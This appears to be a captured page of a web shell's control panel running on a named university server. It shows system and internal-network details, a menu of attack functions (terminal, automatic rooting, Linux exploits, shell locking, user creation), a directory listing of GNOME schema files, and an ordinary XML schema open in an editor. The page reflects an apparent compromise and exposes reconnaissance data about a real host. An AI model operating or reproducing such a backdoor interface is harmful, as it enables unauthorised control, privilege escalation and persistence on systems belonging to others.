Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
snap /
snap-store /
1113 /
usr /
share /
glib-2.0 /
schemas /
[ HOME SHELL ]
Name
Size
Permission
Action
10_gsettings-desktop-schemas.gschema.override
342
B
-rw-r--r--
10_ubuntu-settings.gschema.override
6.39
KB
-rw-r--r--
org.gnome.ControlCenter.gschema.xml
801
B
-rw-r--r--
org.gnome.desktop.a11y.applications.gschema.xml
845
B
-rw-r--r--
org.gnome.desktop.a11y.gschema.xml
828
B
-rw-r--r--
org.gnome.desktop.a11y.interface.gschema.xml
422
B
-rw-r--r--
org.gnome.desktop.a11y.keyboard.gschema.xml
4.78
KB
-rw-r--r--
org.gnome.desktop.a11y.magnifier.gschema.xml
9.16
KB
-rw-r--r--
org.gnome.desktop.a11y.mouse.gschema.xml
2.84
KB
-rw-r--r--
org.gnome.desktop.app-folders.gschema.xml
1.8
KB
-rw-r--r--
org.gnome.desktop.background.gschema.xml
2.55
KB
-rw-r--r--
org.gnome.desktop.calendar.gschema.xml
427
B
-rw-r--r--
org.gnome.desktop.datetime.gschema.xml
439
B
-rw-r--r--
org.gnome.desktop.default-applications.gschema.xml
3.02
KB
-rw-r--r--
org.gnome.desktop.enums.xml
6.41
KB
-rw-r--r--
org.gnome.desktop.input-sources.gschema.xml
2.49
KB
-rw-r--r--
org.gnome.desktop.interface.gschema.xml
12.18
KB
-rw-r--r--
org.gnome.desktop.lockdown.gschema.xml
3.37
KB
-rw-r--r--
org.gnome.desktop.media-handling.gschema.xml
2.54
KB
-rw-r--r--
org.gnome.desktop.notifications.gschema.xml
2.77
KB
-rw-r--r--
org.gnome.desktop.peripherals.gschema.xml
13.32
KB
-rw-r--r--
org.gnome.desktop.privacy.gschema.xml
4.79
KB
-rw-r--r--
org.gnome.desktop.screensaver.gschema.xml
6.05
KB
-rw-r--r--
org.gnome.desktop.search-providers.gschema.xml
1.86
KB
-rw-r--r--
org.gnome.desktop.session.gschema.xml
668
B
-rw-r--r--
org.gnome.desktop.sound.gschema.xml
1.03
KB
-rw-r--r--
org.gnome.desktop.thumbnail-cache.gschema.xml
600
B
-rw-r--r--
org.gnome.desktop.thumbnailers.gschema.xml
866
B
-rw-r--r--
org.gnome.desktop.wm.keybindings.gschema.xml
13.31
KB
-rw-r--r--
org.gnome.desktop.wm.preferences.gschema.xml
12.61
KB
-rw-r--r--
org.gnome.software.gschema.xml
7.58
KB
-rw-r--r--
org.gnome.system.locale.gschema.xml
448
B
-rw-r--r--
org.gnome.system.location.gschema.xml
1.13
KB
-rw-r--r--
org.gnome.system.proxy.gschema.xml
6.2
KB
-rw-r--r--
org.gtk.Settings.ColorChooser.gschema.xml
931
B
-rw-r--r--
org.gtk.Settings.Debug.gschema.xml
833
B
-rw-r--r--
org.gtk.Settings.EmojiChooser.gschema.xml
623
B
-rw-r--r--
org.gtk.Settings.FileChooser.gschema.xml
6.07
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : org.gnome.desktop.input-sources.gschema.xml
<?xml version="1.0" encoding="UTF-8"?> <schemalist gettext-domain="gsettings-desktop-schemas"> <schema id="org.gnome.desktop.input-sources" path="/org/gnome/desktop/input-sources/"> <key name="current" type="u"> <default>0</default> <summary>Current input source</summary> <description> The zero-based index into the input sources list specifying the current one in effect. The value is automatically capped to remain in the range [0, sources_length) as long as the sources list isn’t empty. DEPRECATED: This key is deprecated and ignored. </description> </key> <key name="sources" type="a(ss)"> <default>[]</default> <summary>List of input sources</summary> <description> List of input source identifiers available. Each source is specified as a tuple of 2 strings. The first string is the type and can be one of “xkb” or “ibus”. For “xkb” sources the second string is “xkb_layout+xkb_variant” or just “xkb_layout” if a XKB variant isn’t needed. For “ibus” sources the second string is the IBus engine name. An empty list means that the X server’s current XKB layout and variant won’t be touched and IBus won’t be used. </description> </key> <key name="mru-sources" type="a(ss)"> <default>[]</default> <summary>List of most recently used input sources</summary> <description> List of most recently used input sources. The value is in the same format as the available sources list. </description> </key> <key name="xkb-options" type="as"> <default>[]</default> <summary>List of XKB options</summary> <description> List of XKB options. Each option is an XKB option string as defined by xkeyboard-config’s rules files. </description> </key> <key name="show-all-sources" type="b"> <default>false</default> <summary>Show all installed input sources</summary> <description> Makes all installed input sources available for choosing in System Settings. </description> </key> <key name="per-window" type="b"> <default>false</default> <summary>Use different input sources for each window</summary> <description> When enabled, input sources get attached to the currently focused window when activated. </description> </key> </schema> </schemalist>
Close